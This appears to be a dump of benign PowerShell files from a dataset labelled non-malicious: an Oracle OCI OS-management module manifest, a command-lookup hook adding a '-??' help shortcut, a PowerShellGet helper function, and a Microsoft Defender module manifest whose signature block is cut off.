# Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export.
FunctionsToExport = '*'
# Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export.
CmdletsToExport = 'Add-OCIOsmanagementPackagesToSoftwareSource',
'Disable-OCIOsmanagementModuleStreamOnManagedInstance',
'DisMount-OCIOsmanagementChildSoftwareSourceFromManagedInstance',
'DisMount-OCIOsmanagementManagedInstanceFromManagedInstanceGroup',
'DisMount-OCIOsmanagementParentSoftwareSourceFromManagedInstance',
'Enable-OCIOsmanagementModuleStreamOnManagedInstance',
'Get-OCIOsmanagementAvailablePackagesForManagedInstanceList',
'Get-OCIOsmanagementAvailableSoftwareSourcesForManagedInstanceList',
'Get-OCIOsmanagementAvailableUpdatesForManagedInstanceList',
'Get-OCIOsmanagementAvailableWindowsUpdatesForManagedInstanceList',
'Get-OCIOsmanagementErrataList', 'Get-OCIOsmanagementErratum',
'Get-OCIOsmanagementEvent', 'Get-OCIOsmanagementEventContent',
'Get-OCIOsmanagementEventReport', 'Get-OCIOsmanagementEventsList',
'Get-OCIOsmanagementManagedInstance',
'Get-OCIOsmanagementManagedInstanceErrataList',
'Get-OCIOsmanagementManagedInstanceGroup',
'Get-OCIOsmanagementManagedInstanceGroupsList',
'Get-OCIOsmanagementManagedInstancesList',
'Get-OCIOsmanagementModuleStream',
'Get-OCIOsmanagementModuleStreamProfile',
'Get-OCIOsmanagementModuleStreamProfilesList',
'Get-OCIOsmanagementModuleStreamProfilesOnManagedInstanceList',
'Get-OCIOsmanagementModuleStreamsList',
'Get-OCIOsmanagementModuleStreamsOnManagedInstanceList',
'Get-OCIOsmanagementPackagesInstalledOnManagedInstanceList',
'Get-OCIOsmanagementRelatedEventsList',
'Get-OCIOsmanagementScheduledJob',
'Get-OCIOsmanagementScheduledJobsList',
'Get-OCIOsmanagementSoftwarePackage',
'Get-OCIOsmanagementSoftwareSource',
'Get-OCIOsmanagementSoftwareSourcePackagesList',
'Get-OCIOsmanagementSoftwareSourcesList',
'Get-OCIOsmanagementUpcomingScheduledJobsList',
'Get-OCIOsmanagementWindowsUpdate',
'Get-OCIOsmanagementWindowsUpdatesInstalledOnManagedInstanceList',
'Get-OCIOsmanagementWindowsUpdatesList',
'Get-OCIOsmanagementWorkRequest',
'Get-OCIOsmanagementWorkRequestErrorsList',
'Get-OCIOsmanagementWorkRequestLogsList',
'Get-OCIOsmanagementWorkRequestsList',
'Invoke-OCIOsmanagementInstallAllPackageUpdatesOnManagedInstance',
'Invoke-OCIOsmanagementInstallAllUpdatesOnManagedInstanceGroup',
'Invoke-OCIOsmanagementInstallAllWindowsUpdatesOnManagedInstance',
'Invoke-OCIOsmanagementInstallModuleStreamProfileOnManagedInstance',
'Invoke-OCIOsmanagementInstallPackageOnManagedInstance',
'Invoke-OCIOsmanagementInstallPackageUpdateOnManagedInstance',
'Invoke-OCIOsmanagementInstallWindowsUpdateOnManagedInstance',
'Invoke-OCIOsmanagementManageModuleStreamsOnManagedInstance',
'Invoke-OCIOsmanagementRunScheduledJobNow',
'Invoke-OCIOsmanagementSearchSoftwarePackages',
'Invoke-OCIOsmanagementSkipNextScheduledJobExecution',
'Invoke-OCIOsmanagementSwitchModuleStreamOnManagedInstance',
'Mount-OCIOsmanagementChildSoftwareSourceToManagedInstance',
'Mount-OCIOsmanagementManagedInstanceToManagedInstanceGroup',
'Mount-OCIOsmanagementParentSoftwareSourceToManagedInstance',
'Move-OCIOsmanagementManagedInstanceGroupCompartment',
'Move-OCIOsmanagementScheduledJobCompartment',
'Move-OCIOsmanagementSoftwareSourceCompartment',
'New-OCIOsmanagementManagedInstanceGroup',
'New-OCIOsmanagementScheduledJob',
'New-OCIOsmanagementSoftwareSource',
'Remove-OCIOsmanagementEventContent',
'Remove-OCIOsmanagementManagedInstanceGroup',
'Remove-OCIOsmanagementModuleStreamProfileFromManagedInstance',
'Remove-OCIOsmanagementPackageFromManagedInstance',
'Remove-OCIOsmanagementPackagesFromSoftwareSource',
'Remove-OCIOsmanagementScheduledJob',
'Remove-OCIOsmanagementSoftwareSource',
'Update-OCIOsmanagementEvent',
'Update-OCIOsmanagementManagedInstance',
'Update-OCIOsmanagementManagedInstanceGroup',
'Update-OCIOsmanagementScheduledJob',
'Update-OCIOsmanagementSoftwareSource',
'Write-OCIOsmanagementEventContent'
# Variables to export from this module
VariablesToExport = '*'
# Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export.
AliasesToExport = '*'
# DSC resources to export from this module
# DscResourcesToExport = @()
# List of all modules packaged with this module
# ModuleList = @()
# List of all files packaged with this module
# FileList = @()
# Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell.
PrivateData = @{
PSData = @{
# Tags applied to this module. These help with module discovery in online galleries.
Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Osmanagement'
# A URL to the license for this module.
LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt'
# A URL to the main website for this project.
ProjectUri = 'https://github.com/oracle/oci-powershell-modules/'
# A URL to an icon representing this module.
IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png'
# ReleaseNotes of this module
ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md'
# Prerelease string of this module
# Prerelease = ''
# Flag to indicate whether the module requires explicit user acceptance for install/update/save
# RequireLicenseAcceptance = $false
# External dependent modules of this module
# ExternalModuleDependencies = @()
} # End of PSData hashtable
} # End of PrivateData hashtable
# HelpInfo URI of this module
# HelpInfoURI = ''
# Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix.
# DefaultCommandPrefix = ''
}
|
combined_dataset/train/non-malicious/Add -__ Get-Help -Full.ps1
|
Add -__ Get-Help -Full.ps1
|
$executionContext.SessionState.InvokeCommand.PostCommandLookupAction = {
param($CommandName, $CommandLookupEventArgs)
# Only for interactive commands (and that doesn't include "prompt")
# I should exclude out-default so we don't handle it on every pipeline, but ...
if($CommandLookupEventArgs.CommandOrigin -eq "Runspace" -and $CommandName -ne "prompt" ) {
## Create a new script block that checks for the "-??" argument
## And if -?? exists, calls Get-Help -Full instead
## Otherwise calls the expected command
$CommandLookupEventArgs.CommandScriptBlock = {
if($Args.Length -eq 1 -and $Args[0] -eq "-??") {
Get-Help $CommandName -Full
} else {
& $CommandName @args
}
## Wrap it in a closure because we need $CommandName
}.GetNewClosure()
}
}
|
combined_dataset/train/non-malicious/4381.ps1
|
4381.ps1
|
function New-ModuleSourceFromPackageSource
{
param
(
[Parameter(Mandatory=$true)]
$PackageSource
)
$moduleSource = Microsoft.PowerShell.Utility\New-Object PSCustomObject -Property ([ordered]@{
Name = $PackageSource.Name
SourceLocation = $PackageSource.Location
Trusted=$PackageSource.IsTrusted
Registered=$PackageSource.IsRegistered
InstallationPolicy = $PackageSource.Details['InstallationPolicy']
PackageManagementProvider=$PackageSource.Details['PackageManagementProvider']
PublishLocation=$PackageSource.Details[$script:PublishLocation]
ScriptSourceLocation=$PackageSource.Details[$script:ScriptSourceLocation]
ScriptPublishLocation=$PackageSource.Details[$script:ScriptPublishLocation]
ProviderOptions = @{}
})
$PackageSource.Details.GetEnumerator() | Microsoft.PowerShell.Core\ForEach-Object {
if($_.Key -ne 'PackageManagementProvider' -and
$_.Key -ne $script:PublishLocation -and
$_.Key -ne $script:ScriptPublishLocation -and
$_.Key -ne $script:ScriptSourceLocation -and
$_.Key -ne 'InstallationPolicy')
{
$moduleSource.ProviderOptions[$_.Key] = $_.Value
}
}
$moduleSource.PSTypeNames.Insert(0, "Microsoft.PowerShell.Commands.PSRepository")
Write-Output -InputObject $moduleSource
}
|
combined_dataset/train/non-malicious/sample_34_19.ps1
|
sample_34_19.ps1
|
@{
GUID = 'A51E6D9E-BC14-41A7-98A8-888195641250'
Author="Microsoft Corporation"
CompanyName="Microsoft Corporation"
Copyright="Copyright (C) Microsoft Corporation. All rights reserved."
ModuleVersion = '1.0'
NestedModules = @('MSFT_MpPerformanceRecording.psm1')
FormatsToProcess = @('MSFT_MpPerformanceReport.Format.ps1xml')
CompatiblePSEditions = @('Desktop', 'Core')
FunctionsToExport = @( 'New-MpPerformanceRecording',
'Get-MpPerformanceReport'
)
HelpInfoUri="http://go.microsoft.com/fwlink/?linkid=390762"
PowerShellVersion = '5.1'
}
# SIG # Begin signature block
# MIImAgYJKoZIhvcNAQcCoIIl8zCCJe8CAQExDzANBglghkgBZQMEAgEFADB5Bgor
# BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG
# KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCC5QoGq9EV41ZN5
# fnwNlxKx8aIBP8W7y/AxkQ4SrJmPcKCCC1MwggTgMIIDyKADAgECAhMzAAAK7CQL
# sju2bxocAAAAAArsMA0GCSqGSIb3DQEBCwUAMHkxCzAJBgNVBAYTAlVTMRMwEQYD
# VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24xIzAhBgNVBAMTGk1pY3Jvc29mdCBXaW5kb3dzIFBD
# QSAyMDEwMB4XDTIzMTAxOTE5MTgwM1oXDTI0MTAxNjE5MTgwM1owcDELMAkGA1UE
# BhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAc
# BgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEaMBgGA1UEAxMRTWljcm9zb2Z0
# IFdpbmRvd3MwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDxlYs7SirE
# 2DMWmJDHmyPDmkzh+fLl2bNdYJFYVIxEDXmuYo7qVT/TlzRyHZNjfnCpNIN5BGy+
# tL1DHfbYMyeZ64rRBk5ZDyfxpC0PjuOKeo8l1Yp0DYH8o/tovvyg/7t7RBqawaFi
# 8mo9wrD5ISkTwSSMv2itkTg00L+gE8awFU17AUmplCQ9mZ91C/9wLp9wH9bIBGm5
# LnsMVzGxaxLbcqzuyi0CUj0ANTuQNZUFNTvLWj/k3W3j7iiNZRDaniVqF2i7UEpU
# Twl0A2/ET31/zrvHBzhJKaUtC31IicLI8HqTuUA96FAxGfczxleoZI6jXS2sWSYI
# wU6YnckWSSAhAgMBAAGjggFoMIIBZDAfBgNVHSUEGDAWBgorBgEEAYI3CgMGBggr
# BgEFBQcDAzAdBgNVHQ4EFgQUK97sk9qa9IVpYVlzmmULjVzY6akwRQYDVR0RBD4w
# PKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEWMBQGA1UEBRMN
# MjMwMDI4KzUwMTcwMjAfBgNVHSMEGDAWgBTRT6mKBwjO9CQYmOUA//PWeR03vDBT
# BgNVHR8ETDBKMEigRqBEhkJodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny
# bC9wcm9kdWN0cy9NaWNXaW5QQ0FfMjAxMC0wNy0wNi5jcmwwVwYIKwYBBQUHAQEE
# SzBJMEcGCCsGAQUFBzAChjtodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpL2Nl
# cnRzL01pY1dpblBDQV8yMDEwLTA3LTA2LmNydDAMBgNVHRMBAf8EAjAAMA0GCSqG
# SIb3DQEBCwUAA4IBAQArGdljm580qkATgRqYVsgvfdFUkL/7TpOb8yh1h5vk2SEL
# El5Bfz46bs3+ywayV/mXd8Y43M3yku5Dp7dMwRXkze6j4LJLpLQ4CMPN4fvtlPkb
# w+fQmXkHjogsb4bcJo/aUKfLy4hGUbw+uqKBLx0RRIEj6Vj2m5W7lB+rdBl8hhtr
# v5F4HYoy9lvXQhGGDwSsph+0uaZvCXSP7DOM3wOaYUQSNX6hYF5EHZsPrd334YGd
# dTWIPRHrOWqg9FplGJumgZLgdlwY+WNZbXGCZwEQN3P88LTgrH/gmlSD0fHbZDyM
# YZ77M6PFlz4eXvC6I7J3VemS8OoU4DzYgxSahDXFMIIGazCCBFOgAwIBAgIKYQxq
# GQAAAAAABDANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgT
# Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29m
# dCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNh
# dGUgQXV0aG9yaXR5IDIwMTAwHhcNMTAwNzA2MjA0MDIzWhcNMjUwNzA2MjA1MDIz
# WjB5MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH
# UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSMwIQYDVQQD
# ExpNaWNyb3NvZnQgV2luZG93cyBQQ0EgMjAxMDCCASIwDQYJKoZIhvcNAQEBBQAD
# ggEPADCCAQoCggEBAMB5uzqx8A+EuK1kKnUWc9C7B/Y+DZ0U5LGfwciUsDh8H9Az
# VfW6I2b1LihIU8cWg7r1Uax+rOAmfw90/FmV3MnGovdScFosHZSrGb+vlX2vZqFv
# m2JubUu8LzVs3qRqY1pf+/MNTWHMCn4x62wK0E2XD/1/OEbmisdzaXZVaZZM5Njw
# NOu6sR/OKX7ET50TFasTG3JYYlZsioGjZHeYRmUpnYMUpUwIoIPXIx/zX99vLM/a
# FtgOcgQo2Gs++BOxfKIXeU9+3DrknXAna7/b/B7HB9jAvguTHijgc23SVOkoTL9r
# XZ//XTMSN5UlYTRqQst8nTq7iFnho0JtOlBbSNECAwEAAaOCAeMwggHfMBAGCSsG
# AQQBgjcVAQQDAgEAMB0GA1UdDgQWBBTRT6mKBwjO9CQYmOUA//PWeR03vDAZBgkr
# BgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUw
# AwEB/zAfBgNVHSMEGDAWgBTV9lbLj+iiXGJo0T2UkFvXzpoYxDBWBgNVHR8ETzBN
# MEugSaBHhkVodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2NybC9wcm9kdWN0
# cy9NaWNSb29DZXJBdXRfMjAxMC0wNi0yMy5jcmwwWgYIKwYBBQUHAQEETjBMMEoG
# CCsGAQUFBzAChj5odHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpL2NlcnRzL01p
# Y1Jvb0NlckF1dF8yMDEwLTA2LTIzLmNydDCBnQYDVR0gBIGVMIGSMIGPBgkrBgEE
# AYI3LgMwgYEwPQYIKwYBBQUHAgEWMWh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9Q
# S0kvZG9jcy9DUFMvZGVmYXVsdC5odG0wQAYIKwYBBQUHAgIwNB4yIB0ATABlAGcA
# YQBsAF8AUABvAGwAaQBjAHkAXwBTAHQAYQB0AGUAbQBlAG4AdAAuIB0wDQYJKoZI
# hvcNAQELBQADggIBAC5Bpoa1Bm/wgIX6O8oX6cn65DnClHDDZJTD2FamkI7+5Jr0
# bfVvjlONWqjzrttGbL5/HVRWGzwdccRRFVR+v+6llUIz/Q2QJCTj+dyWyvy4rL/0
# wjlWuLvtc7MX3X6GUCOLViTKu6YdmocvJ4XnobYKnA0bjPMAYkG6SHSHgv1QyfSH
# KcMDqivfGil56BIkmobt0C7TQIH1B18zBlRdQLX3sWL9TUj3bkFHUhy7G8JXOqiZ
# VpPUxt4mqGB1hrvsYqbwHQRF3z6nhNFbRCNjJTZ3b65b3CLVFCNqQX/QQqbb7yV7
# BOPSljdiBq/4Gw+Oszmau4n1NQblpFvDjJ43X1PRozf9pE/oGw5rduS4j7DC6v11
# 9yxBt5yj4R4F/peSy39ZA22oTo1OgBfU1XL2VuRIn6MjugagwI7RiE+TIPJwX9hr
# cqMgSfx3DF3Fx+ECDzhCEA7bAq6aNx1QgCkepKfZxpolVf1Ayq1kEOgx+RJUeRry
# DtjWqx4z/gLnJm1hSY/xJcKLdJnf+ZMakBzu3ZQzDkJQ239Q+J9iguymghZ8Zrzs
# mbDBWF2osJphFJHRmS9J5D6Bmdbm78rj/T7u7AmGAwcNGw186/RayZXPhxIKXezF
# ApLNBZlyyn3xKhAYOOQxoyi05kzFUqOcasd9wHEJBA1w3gI/h+5WoezrtUyFMYIa
# BTCCGgECAQEwgZAweTELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x
# EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv
# bjEjMCEGA1UEAxMaTWljcm9zb2Z0IFdpbmRvd3MgUENBIDIwMTACEzMAAArsJAuy
# O7ZvGhwAAAAACuwwDQYJYIZIAWUDBAIBBQCgga4wGQYJKoZIhvcNAQkDMQwGCisG
# AQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEOMAwGCisGAQQBgjcCARUwLwYJKoZIhvcN
# AQkEMSIEICjaAYW6dpF96OECCa1j0HmEWEEdofGluuKSKwAnvISeMEIGCisGAQQB
# gjcCAQwxNDAyoBSAEgBNAGkAYwByAG8AcwBvAGYAdKEagBhodHRwOi8vd3d3Lm1p
# Y3Jvc29mdC5jb20wDQYJKoZIhvcNAQEBBQAEggEALzIUfydds/lAn8wg+foVEOxU
# P04PWhoHTYiyOeWsFk1kXQCK1+MBcg+UbtfgO2LPZB6vWWmD0/q9ShL4G8vA3xfI
# uN8Wt9DWThKG1b9xBm3x1nPo5Ey3Bd5XGhmZf37/Bj7HOoCSKb+2osiQS6WTUb8+
# j/ifuMLxJcyqF2hOPiogTcslwIDBgc/4oD49TXkCnbefTIX12ceUuhV4mZ0V+X97
# uS2vhmkTW3jOuv88DmujL24NrbM+FBTq44smIE4d6iqPmeI/sVgrvKZEGEhiSotk
# MJLDzNr0IQBqjOHsjHx26H9kKHEwmoA97gluyYer2M4H/TKM77+mCcyJnCn0b6GC
# F5QwgheQBgorBgEEAYI3AwMBMYIXgDCCF3wGCSqGSIb3DQEHAqCCF20wghdpAgED
# MQ8wDQYJYIZIAWUDBAIBBQAwggFSBgsqhkiG9w0BCRABBKCCAUEEggE9MIIBOQIB
# AQYKKwYBBAGEWQoDATAxMA0GCWCGSAFlAwQCAQUABCABZ4Dgpg/f9krqiUcXw8tT
# y7jhnvCveoTuPnxZ2P5U2AIGZfLg5avbGBMyMDI0MDMyNzA4MDA1OC45MjRaMASA
# AgH0oIHRpIHOMIHLMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQ
# MA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9u
# MSUwIwYDVQQLExxNaWNyb3NvZnQgQW1lcmljYSBPcGVyYXRpb25zMScwJQYDVQQL
# Ex5uU2hpZWxkIFRTUyBFU046QTQwMC0wNUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jv
# c29mdCBUaW1lLVN0YW1wIFNlcnZpY2WgghHqMIIHIDCCBQigAwIBAgITMwAAAezg
# K6SC0JFSgAABAAAB7DANBgkqhkiG9w0BAQsFADB8MQswCQYDVQQGEwJVUzETMBEG
# A1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWlj
# cm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFt
# cCBQQ0EgMjAxMDAeFw0yMzEyMDYxODQ1MzhaFw0yNTAzMDUxODQ1MzhaMIHLMQsw
# CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u
# ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQLExxNaWNy
# b3NvZnQgQW1lcmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxkIFRTUyBF
# U046QTQwMC0wNUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1w
# IFNlcnZpY2UwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQCwR/RuCTbg
# xUWVm/Vdul22uwdEZm0IoAFs6oIr39VK/ItP80cn+8TmtP67iabB4DmAKJ9GH6dJ
# GhEPJpY4vTKRSOwrRNxVIKoPPeUF3f4VyHEco/u1QUadlwD132NuZCxbnh6Mi2lL
# G7pDvszZqMG7S3MCi2bk2nvtGKdeAIL+H77gL4r01TSWb7rsE2Jb1P/N6Y/W1CqD
# i1/Ib3/zRqWXt4zxvdIGcPjS4ZKyQEF3SEZAq4XIjiyowPHaqNbZxdf2kWO/ajdf
# TU85t934CXAinb0o+uQ9KtaKNLVVcNf5QpS4f6/MsXOvIFuCYMRdKDjpmvowAeL+
# 1j27bCxCBpDQHrWkfPzZp/X+bt9C7E5hPP6HVRoqBYR7u1gUf5GEq+5r1HA0jajn
# 0Q6OvfYckE0HdOv6KWa+sAmJG7PDvTZae77homzx6IPqggVpNZuCk79SfVmnKu9F
# 58UAnU58TqDHEzGsQnMUQKstS3zjn6SU0NLEFNCetluaKkqWDRVLEWbu329IEh3t
# qXPXfy6Rh/wCbwe9SCJIoqtBexBrPyQYA2Xaz1fK9ysTsx0kA9V1JwVV44Ia9c+M
# wtAR6sqKdAgRo/bs/Xu8gua8LDe6KWyu974e9mGW7ZO8narDFrAT1EXGHDueygSK
# vv2K7wB8lAgMGJj73CQvr+jqoWwx6XdyeQIDAQABo4IBSTCCAUUwHQYDVR0OBBYE
# FPRa0Edk/iv1whYQsV8UgEf4TIWGMB8GA1UdIwQYMBaAFJ+nFV0AXmJdg/Tl0mWn
# G1M1GelyMF8GA1UdHwRYMFYwVKBSoFCGTmh0dHA6Ly93d3cubWljcm9zb2Z0LmNv
# bS9wa2lvcHMvY3JsL01pY3Jvc29mdCUyMFRpbWUtU3RhbXAlMjBQQ0ElMjAyMDEw
# KDEpLmNybDBsBggrBgEFBQcBAQRgMF4wXAYIKwYBBQUHMAKGUGh0dHA6Ly93d3cu
# bWljcm9zb2Z0LmNvbS9wa2lvcHMvY2VydHMvTWljcm9zb2Z0JTIwVGltZS1TdGFt
# cCUyMFBDQSUyMDIwMTAoMSkuY3J0MAwGA1UdEwEB/wQCMAAwFgYDVR0lAQH/BAww
# CgYIKwYBBQUHAwgwDgYDVR0PAQH/BAQDAgeAMA0GCSqGSIb3DQEBCwUAA4ICAQCS
# vMSkMSrvjlDPag8ARb0OFrAQtSLMDpN0UY3FjvPhwGKDrrixmnuMfjrmVjRq1u8I
# hkDvGF/bffbFTr+IAnDSeg8TB9zfG/4ybknuopklbeGjbt7MLxpfholCERyEc20P
# MZKJz9SvzfuO1n5xrrLOL8m0nmv5kBcv+y1AXJ5QcLicmhe2Ip3/D67Ed6oPqQI0
# 3mDjYaS1NQhBNtu57wPKXZ1EoNToBk8bA6839w119b+a9WToqIskdRGoP5xjDIv+
# mc0vBHhZGkJVvfIhm4Ap8zptC7xVAly0jeOv5dUGMCYgZjvoTmgd45bqAwundmPl
# Gur7eleWYedLQf7s3L5+qfaY/xEh/9uo17SnM/gHVSGAzvnreGhOrB2LtdKoVSe5
# LbYpihXctDe76iYtL+mhxXPEpzda3bJlhPTOQ3KOEZApVERBo5yltWjPCWlXxyCp
# l5jj9nY0nfd071bemnou8A3rUZrdgKIautsH7SHOiOebZGqNu+622vJta3eAYsCA
# axAcB9BiJPla7Xad9qrTYdT45VlCYTtBSY4oVRsedSADv99jv/iYIAGy1bCytua0
# o/Qqv9erKmzQCTVMXaDc25DTLcMGJrRua3K0xivdtnoBexzVJr6yXqM+Ba2whIVR
# vGcriBkKX0FJFeW7r29XX+k0e4DnG6iBHKQjec6VNzCCB3EwggVZoAMCAQICEzMA
# AAAVxedrngKbSZkAAAAAABUwDQYJKoZIhvcNAQELBQAwgYgxCzAJBgNVBAYTAlVT
# MRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQK
# ExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xMjAwBgNVBAMTKU1pY3Jvc29mdCBSb290
# IENlcnRpZmljYXRlIEF1dGhvcml0eSAyMDEwMB4XDTIxMDkzMDE4MjIyNVoXDTMw
# MDkzMDE4MzIyNVowfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x
# EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv
# bjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwggIiMA0G
# CSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQDk4aZM57RyIQt5osvXJHm9DtWC0/3u
# nAcH0qlsTnXIyjVX9gF/bErg4r25PhdgM/9cT8dm95VTcVrifkpa/rg2Z4VGIwy1
# jRPPdzLAEBjoYH1qUoNEt6aORmsHFPPFdvWGUNzBRMhxXFExN6AKOG6N7dcP2CZT
# fDlhAnrEqv1yaa8dq6z2Nr41JmTamDu6GnszrYBbfowQHJ1S/rboYiXcag/PXfT+
# jlPP1uyFVk3v3byNpOORj7I5LFGc6XBpDco2LXCOMcg1KL3jtIckw+DJj361VI/c
# +gVVmG1oO5pGve2krnopN6zL64NF50ZuyjLVwIYwXE8s4mKyzbnijYjklqwBSru+
# cakXW2dg3viSkR4dPf0gz3N9QZpGdc3EXzTdEonW/aUgfX782Z5F37ZyL9t9X4C6
# 26p+Nuw2TPYrbqgSUei/BQOj0XOmTTd0lBw0gg/wEPK3Rxjtp+iZfD9M269ewvPV
# 2HM9Q07BMzlMjgK8QmguEOqEUUbi0b1qGFphAXPKZ6Je1yh2AuIzGHLXpyDwwvoS
# CtdjbwzJNmSLW6CmgyFdXzB0kZSU2LlQ+QuJYfM2BjUYhEfb3BvR/bLUHMVr9lxS
# UV0S2yW6r1AFemzFER1y7435UsSFF5PAPBXbGjfHCBUYP3irRbb1Hode2o+eFnJp
# xq57t7c+auIurQIDAQABo4IB3TCCAdkwEgYJKwYBBAGCNxUBBAUCAwEAATAjBgkr
# BgEEAYI3FQIEFgQUKqdS/mTEmr6CkTxGNSnPEP8vBO4wHQYDVR0OBBYEFJ+nFV0A
# XmJdg/Tl0mWnG1M1GelyMFwGA1UdIARVMFMwUQYMKwYBBAGCN0yDfQEBMEEwPwYI
# KwYBBQUHAgEWM2h0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvRG9jcy9S
# ZXBvc2l0b3J5Lmh0bTATBgNVHSUEDDAKBggrBgEFBQcDCDAZBgkrBgEEAYI3FAIE
# DB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNV
# HSMEGDAWgBTV9lbLj+iiXGJo0T2UkFvXzpoYxDBWBgNVHR8ETzBNMEugSaBHhkVo
# dHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29D
# ZXJBdXRfMjAxMC0wNi0yMy5jcmwwWgYIKwYBBQUHAQEETjBMMEoGCCsGAQUFBzAC
# hj5odHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpL2NlcnRzL01pY1Jvb0NlckF1
# dF8yMDEwLTA2LTIzLmNydDANBgkqhkiG9w0BAQsFAAOCAgEAnVV9/Cqt4SwfZwEx
# JFvhnnJL/Klv6lwUtj5OR2R4sQaTlz0xM7U518JxNj/aZGx80HU5bbsPMeTCj/ts
# 0aGUGCLu6WZnOlNN3Zi6th542DYunKmCVgADsAW+iehp4LoJ7nvfam++Kctu2D9I
# dQHZGN5tggz1bSNU5HhTdSRXud2f8449xvNo32X2pFaq95W2KFUn0CS9QKC/GbYS
# EhFdPSfgQJY4rPf5KYnDvBewVIVCs/wMnosZiefwC2qBwoEZQhlSdYo2wh3DYXMu
# LGt7bj8sCXgU6ZGyqVvfSaN0DLzskYDSPeZKPmY7T7uG+jIa2Zb0j/aRAfbOxnT9
# 9kxybxCrdTDFNLB62FD+CljdQDzHVG2dY3RILLFORy3BFARxv2T5JL5zbcqOCb2z
# AVdJVGTZc9d/HltEAY5aGZFrDZ+kKNxnGSgkujhLmm77IVRrakURR6nxt67I6Ile
# T53S0Ex2tVdUCbFpAUR+fKFhbHP+CrvsQWY9af3LwUFJfn6Tvsv4O+S3Fb+0zj6l
# MVGEvL8CwYKiexcdFYmNcP7ntdAoGokLjzbaukz5m/8K6TT4JDVnK+ANuOaMmdbh
# IurwJ0I9JZTmdHRbatGePu1+oDEzfbzL6Xu/OHBE0ZDxyKs6ijoIYn/ZcGNTTY3u
# gm2lBRDBcQZqELQdVTNYs6FwZvKhggNNMIICNQIBATCB+aGB0aSBzjCByzELMAkG
# A1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQx
# HjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjElMCMGA1UECxMcTWljcm9z
# b2Z0IEFtZXJpY2EgT3BlcmF0aW9uczEnMCUGA1UECxMeblNoaWVsZCBUU1MgRVNO
# OkE0MDAtMDVFMC1EOTQ3MSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBT
